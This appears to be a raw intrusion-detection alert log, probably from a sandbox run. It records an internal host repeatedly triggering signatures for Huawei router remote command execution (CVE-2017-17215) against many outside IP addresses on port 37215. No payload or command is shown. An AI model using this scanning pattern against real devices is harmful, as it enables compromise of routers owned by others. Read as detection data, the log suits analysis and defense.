                                                    07/10/24-08:27:02.851732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4065637215192.168.2.14157.198.24.143
                                                    07/10/24-08:26:59.822867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5037837215192.168.2.14157.104.209.255
                                                    07/10/24-08:26:51.997366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5056237215192.168.2.1441.242.59.158
                                                    07/10/24-08:27:05.072343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3948837215192.168.2.14157.171.2.131
                                                    07/10/24-08:26:25.462724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5544437215192.168.2.1441.185.56.144
                                                    07/10/24-08:26:52.077860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5983037215192.168.2.1441.88.248.183
                                                    07/10/24-08:26:43.781564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4649637215192.168.2.14197.87.57.5
                                                    07/10/24-08:27:17.083143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4117037215192.168.2.14197.162.215.174
                                                    07/10/24-08:26:34.187520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3634037215192.168.2.1441.164.129.124
                                                    07/10/24-08:26:41.500020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4275437215192.168.2.1418.16.240.89
                                                    07/10/24-08:27:23.781687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3695837215192.168.2.1441.255.133.108
                                                    07/10/24-08:26:36.416571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5616837215192.168.2.14197.236.2.245
                                                    07/10/24-08:27:02.870791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4037437215192.168.2.14148.109.107.126
                                                    07/10/24-08:27:32.562679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5527837215192.168.2.14197.2.24.119
                                                    07/10/24-08:26:11.600556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3472837215192.168.2.1441.144.102.136
                                                    07/10/24-08:26:31.071215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3413237215192.168.2.1441.153.84.123
                                                    07/10/24-08:26:31.046551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3323637215192.168.2.14129.191.9.211
                                                    07/10/24-08:26:55.402218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4569237215192.168.2.14157.39.78.25
                                                    07/10/24-08:26:11.093206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4653037215192.168.2.14197.48.229.175
                                                    07/10/24-08:27:13.848645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6058037215192.168.2.1441.142.252.207
                                                    07/10/24-08:27:02.743093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3726037215192.168.2.14197.67.34.23
                                                    07/10/24-08:26:59.661744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6015837215192.168.2.1441.151.104.76
                                                    07/10/24-08:27:14.879570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3585037215192.168.2.1441.189.33.184
                                                    07/10/24-08:27:20.425119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4083837215192.168.2.14110.216.79.246
                                                    07/10/24-08:26:17.999668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5687637215192.168.2.1425.84.242.238
                                                    07/10/24-08:27:14.017711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4426837215192.168.2.1434.164.215.166
                                                    07/10/24-08:27:05.102101TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4500437215192.168.2.14121.203.122.212
                                                    07/10/24-08:26:57.565173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3980437215192.168.2.14137.161.76.140
                                                    07/10/24-08:26:22.290306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5462437215192.168.2.14157.193.158.208
                                                    07/10/24-08:26:22.301370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3553237215192.168.2.14157.230.76.4
                                                    07/10/24-08:26:29.773841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5695437215192.168.2.14157.254.117.6
                                                    07/10/24-08:26:18.008169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4674237215192.168.2.14157.87.149.242
                                                    07/10/24-08:27:02.958280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5092837215192.168.2.14157.141.80.160
                                                    07/10/24-08:27:28.079097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4971237215192.168.2.14177.113.235.85
                                                    07/10/24-08:26:47.854499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5496437215192.168.2.14157.184.179.181
                                                    07/10/24-08:27:22.784576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3402437215192.168.2.1441.141.103.118
                                                    07/10/24-08:27:28.049111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4777237215192.168.2.14197.30.156.16
                                                    07/10/24-08:26:43.685142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3682037215192.168.2.14157.101.65.169
                                                    07/10/24-08:27:30.538484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176037215192.168.2.1441.28.184.189
                                                    07/10/24-08:27:05.242428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5905437215192.168.2.14197.3.63.253
                                                    07/10/24-08:27:10.561915TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3699637215192.168.2.14157.196.54.249
                                                    07/10/24-08:26:38.620224TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5651037215192.168.2.14167.53.80.22
                                                    07/10/24-08:27:14.863402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3364237215192.168.2.1425.50.218.45
                                                    07/10/24-08:26:42.349128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3690237215192.168.2.1441.94.222.44
                                                    07/10/24-08:26:11.661383TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6066237215192.168.2.1441.9.90.125
                                                    07/10/24-08:27:22.800658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3281637215192.168.2.14135.80.226.41
                                                    07/10/24-08:26:17.985720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3483637215192.168.2.1446.97.1.199
                                                    07/10/24-08:27:11.514451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4636837215192.168.2.1441.27.229.70
                                                    07/10/24-08:27:24.986778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4753037215192.168.2.14152.54.36.181
                                                    07/10/24-08:26:59.800330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3998037215192.168.2.14157.218.186.29
                                                    07/10/24-08:27:20.483552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5068437215192.168.2.14161.215.183.244
                                                    07/10/24-08:26:28.777309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4188637215192.168.2.14157.203.100.100
                                                    07/10/24-08:27:24.948023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5036037215192.168.2.14117.235.226.130
                                                    07/10/24-08:26:14.757846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4085637215192.168.2.1441.234.135.223
                                                    07/10/24-08:27:31.532257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6000037215192.168.2.14197.88.205.104
                                                    07/10/24-08:27:24.883721TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3582837215192.168.2.14197.89.245.174
                                                    07/10/24-08:26:53.177633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5825637215192.168.2.14197.0.175.140
                                                    07/10/24-08:26:28.841865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4533637215192.168.2.14190.68.173.0
                                                    07/10/24-08:27:08.350346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5825037215192.168.2.1441.62.179.81
                                                    07/10/24-08:27:07.364210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4470837215192.168.2.14197.167.93.140
                                                    07/10/24-08:27:19.167062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5522437215192.168.2.14157.126.194.112
                                                    07/10/24-08:27:30.444782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5112437215192.168.2.14157.198.224.15
                                                    07/10/24-08:27:19.157761TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913237215192.168.2.14197.245.92.198
                                                    07/10/24-08:27:10.542013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3987637215192.168.2.14157.174.208.93
                                                    07/10/24-08:26:43.677114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5759837215192.168.2.1441.152.89.250
                                                    07/10/24-08:26:41.585181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5696637215192.168.2.14197.114.240.215
                                                    07/10/24-08:26:42.404387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4462637215192.168.2.14197.169.115.21
                                                    07/10/24-08:27:05.182068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4386037215192.168.2.14197.160.207.178
                                                    07/10/24-08:26:23.356000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3401437215192.168.2.14197.238.54.72
                                                    07/10/24-08:27:10.635784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4525437215192.168.2.1497.212.64.28
                                                    07/10/24-08:26:57.498447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3764837215192.168.2.14157.189.143.107
                                                    07/10/24-08:26:31.065824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4206437215192.168.2.1441.24.126.126
                                                    07/10/24-08:26:55.401809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5301437215192.168.2.14150.50.34.170
                                                    07/10/24-08:26:51.943122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3341037215192.168.2.14197.173.251.158
                                                    07/10/24-08:26:23.359081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4192237215192.168.2.14157.244.89.205
                                                    07/10/24-08:26:11.584226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4231237215192.168.2.14197.1.113.95
                                                    07/10/24-08:27:22.929262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3891237215192.168.2.1419.231.39.114
                                                    07/10/24-08:26:41.507674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6027037215192.168.2.14147.50.16.70
                                                    07/10/24-08:26:43.567021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5311237215192.168.2.1441.227.246.76
                                                    07/10/24-08:26:11.578459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5102837215192.168.2.14197.242.235.173
                                                    07/10/24-08:26:43.881879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4672437215192.168.2.14197.130.212.234
                                                    07/10/24-08:26:36.310661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5973837215192.168.2.1441.62.200.48
                                                    07/10/24-08:26:49.781765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3845037215192.168.2.1441.184.230.120
                                                    07/10/24-08:27:14.815899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3481037215192.168.2.14157.182.124.156
                                                    07/10/24-08:27:17.040867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3527037215192.168.2.14197.146.19.151
                                                    07/10/24-08:26:41.395852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5800837215192.168.2.1441.34.70.63
                                                    07/10/24-08:27:22.476492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5497437215192.168.2.14199.139.21.250
                                                    07/10/24-08:26:14.826538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3728437215192.168.2.14157.63.119.85
                                                    07/10/24-08:27:07.362991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737837215192.168.2.1441.143.64.87
                                                    07/10/24-08:27:20.517321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3820237215192.168.2.14157.200.6.89
                                                    07/10/24-08:27:30.538369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3914237215192.168.2.1474.192.224.247
                                                    07/10/24-08:27:22.784576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5832037215192.168.2.14197.87.219.31
                                                    07/10/24-08:26:59.860909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3355837215192.168.2.14198.10.242.162
                                                    07/10/24-08:27:31.555849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4990037215192.168.2.14197.119.210.195
                                                    07/10/24-08:26:15.872361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5153237215192.168.2.14197.52.221.40
                                                    07/10/24-08:27:07.382774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4891037215192.168.2.14157.152.173.53
                                                    07/10/24-08:27:13.816832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5912437215192.168.2.14197.192.41.115
                                                    07/10/24-08:27:19.259031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5898437215192.168.2.1493.45.233.244
                                                    07/10/24-08:26:11.149844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5245037215192.168.2.14197.251.154.46
                                                    07/10/24-08:26:31.077497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5519837215192.168.2.1471.251.133.133
                                                    07/10/24-08:27:07.288154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3536237215192.168.2.1412.218.165.3
                                                    07/10/24-08:26:23.302644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5893437215192.168.2.1441.255.77.45
                                                    07/10/24-08:27:07.286969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355637215192.168.2.14197.50.205.236
                                                    07/10/24-08:27:10.561915TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4609837215192.168.2.1490.230.108.112
                                                    07/10/24-08:27:27.142531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5329037215192.168.2.14171.241.72.170
                                                    07/10/24-08:27:17.063694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5355237215192.168.2.14111.214.124.126
                                                    07/10/24-08:26:43.932722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5393837215192.168.2.1420.202.165.54
                                                    07/10/24-08:26:31.084191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5823237215192.168.2.14197.166.51.126
                                                    07/10/24-08:26:26.574545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892437215192.168.2.1441.190.215.164
                                                    07/10/24-08:27:30.407360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3301637215192.168.2.14157.116.228.75
                                                    07/10/24-08:27:02.933284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6086637215192.168.2.1441.38.39.123
                                                    07/10/24-08:26:43.809234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4157837215192.168.2.1441.154.218.75
                                                    07/10/24-08:27:22.919171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4330037215192.168.2.1441.177.62.68
                                                    07/10/24-08:27:10.642879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5835437215192.168.2.14197.172.28.211
                                                    07/10/24-08:26:33.156135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5335037215192.168.2.1499.137.135.76
                                                    07/10/24-08:26:43.932017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5101837215192.168.2.1441.34.0.36
                                                    07/10/24-08:27:02.720198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5363237215192.168.2.14157.145.106.51
                                                    07/10/24-08:27:30.426359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4739637215192.168.2.14141.176.164.195
                                                    07/10/24-08:26:36.422822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5489037215192.168.2.1441.193.87.38
                                                    07/10/24-08:26:28.648108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3486037215192.168.2.14139.246.44.60
                                                    07/10/24-08:26:47.918271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4226837215192.168.2.14157.228.36.123
                                                    07/10/24-08:26:43.655825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5673037215192.168.2.14157.89.29.87
                                                    07/10/24-08:27:10.616142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5401637215192.168.2.1441.96.36.54
                                                    07/10/24-08:26:26.603545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3887637215192.168.2.1423.227.98.252
                                                    07/10/24-08:26:43.800438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4338237215192.168.2.14197.104.106.207
                                                    07/10/24-08:26:48.021338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4952037215192.168.2.1441.142.115.36
                                                    07/10/24-08:27:13.842727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5518437215192.168.2.14157.229.16.160
                                                    07/10/24-08:26:57.650241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5576237215192.168.2.14197.153.41.22
                                                    07/10/24-08:27:05.183650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5517037215192.168.2.14161.158.145.247
                                                    07/10/24-08:26:18.013020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3785237215192.168.2.14157.121.62.201
                                                    07/10/24-08:27:31.548799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838837215192.168.2.1441.184.71.132
                                                    07/10/24-08:26:15.870897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4750437215192.168.2.1465.147.253.74
                                                    07/10/24-08:26:36.310661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5955437215192.168.2.14197.116.52.30
                                                    07/10/24-08:27:10.585951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4381837215192.168.2.14197.205.201.253
                                                    07/10/24-08:27:22.859417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4762837215192.168.2.14157.94.202.190
                                                    07/10/24-08:26:34.236926TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5598637215192.168.2.14157.65.58.15
                                                    07/10/24-08:26:47.996062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4278237215192.168.2.14157.35.169.150
                                                    07/10/24-08:26:42.446098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3827637215192.168.2.14197.156.33.27
                                                    07/10/24-08:26:15.805311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5221837215192.168.2.14197.95.19.161
                                                    07/10/24-08:27:22.573004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3800637215192.168.2.14197.200.237.30
                                                    07/10/24-08:27:19.191147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5020037215192.168.2.14197.186.81.59
                                                    07/10/24-08:26:17.953506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4685237215192.168.2.1496.175.67.133
                                                    07/10/24-08:26:55.442575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4219237215192.168.2.1442.91.134.98
                                                    07/10/24-08:26:17.962280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4385637215192.168.2.1412.77.187.2
                                                    07/10/24-08:26:59.822486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4643637215192.168.2.14174.9.229.42
                                                    07/10/24-08:26:41.524750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5540837215192.168.2.14197.250.149.175
                                                    07/10/24-08:26:25.433711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4141237215192.168.2.14197.53.159.173
                                                    07/10/24-08:26:55.472198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3359237215192.168.2.14157.30.1.177
                                                    07/10/24-08:26:33.252129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4749437215192.168.2.1427.217.254.39
                                                    07/10/24-08:27:30.560872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5818637215192.168.2.14157.174.249.125
                                                    07/10/24-08:26:49.748241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5570237215192.168.2.1441.239.165.163
                                                    07/10/24-08:26:57.536379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4922237215192.168.2.14157.236.186.231
                                                    07/10/24-08:26:28.679594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4861437215192.168.2.14197.37.158.114
                                                    07/10/24-08:26:59.858149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3278037215192.168.2.14197.240.203.105
                                                    07/10/24-08:26:44.496105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4915437215192.168.2.14197.53.149.228
                                                    07/10/24-08:26:53.237677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3658637215192.168.2.1488.148.42.144
                                                    07/10/24-08:27:03.004386TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5189437215192.168.2.14197.9.179.144
                                                    07/10/24-08:26:47.746309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5495237215192.168.2.1436.30.238.123
                                                    07/10/24-08:27:33.734254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5647837215192.168.2.1487.144.135.181
                                                    07/10/24-08:27:32.580487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3440037215192.168.2.14157.106.209.99
                                                    07/10/24-08:27:33.687075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4128637215192.168.2.14157.191.90.161
                                                    07/10/24-08:26:49.761554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5515037215192.168.2.14157.148.56.163
                                                    07/10/24-08:27:17.078859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3512637215192.168.2.14197.65.190.70
                                                    07/10/24-08:27:22.926314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5686437215192.168.2.14157.134.246.248
                                                    07/10/24-08:26:15.799288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5476637215192.168.2.1417.100.117.157
                                                    07/10/24-08:26:59.630762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5608837215192.168.2.14166.82.62.198
                                                    07/10/24-08:26:59.654831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5223237215192.168.2.14157.202.137.192
                                                    07/10/24-08:26:42.376307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4349637215192.168.2.14117.225.206.102
                                                    07/10/24-08:26:26.498408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3455837215192.168.2.14197.59.113.214
                                                    07/10/24-08:27:19.327532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5029037215192.168.2.1441.235.71.6
                                                    07/10/24-08:26:15.796223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6026437215192.168.2.14157.50.209.6
                                                    07/10/24-08:26:51.949287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574437215192.168.2.1477.174.105.247
                                                    07/10/24-08:27:30.525372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4041037215192.168.2.14157.108.112.45
                                                    07/10/24-08:26:59.834726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5109037215192.168.2.14197.27.173.71
                                                    07/10/24-08:26:28.768053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4098237215192.168.2.1441.234.239.67
                                                    07/10/24-08:26:45.660346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3624837215192.168.2.14196.12.36.201
                                                    07/10/24-08:26:15.859718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4033637215192.168.2.14157.249.79.50
                                                    07/10/24-08:26:43.858439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4762437215192.168.2.1436.45.15.245
                                                    07/10/24-08:27:05.156197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5684637215192.168.2.1441.240.250.216
                                                    07/10/24-08:26:57.636367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3797037215192.168.2.14128.180.78.17
                                                    07/10/24-08:26:49.829856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6017237215192.168.2.1441.9.213.250
                                                    07/10/24-08:26:14.810948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4203837215192.168.2.1463.252.228.50
                                                    07/10/24-08:27:08.437142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4112837215192.168.2.14157.141.74.7
                                                    07/10/24-08:27:11.527013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5336037215192.168.2.14197.58.52.85
                                                    07/10/24-08:26:43.814052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4201637215192.168.2.14197.234.11.190
                                                    07/10/24-08:27:32.507738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5570037215192.168.2.1441.108.81.201
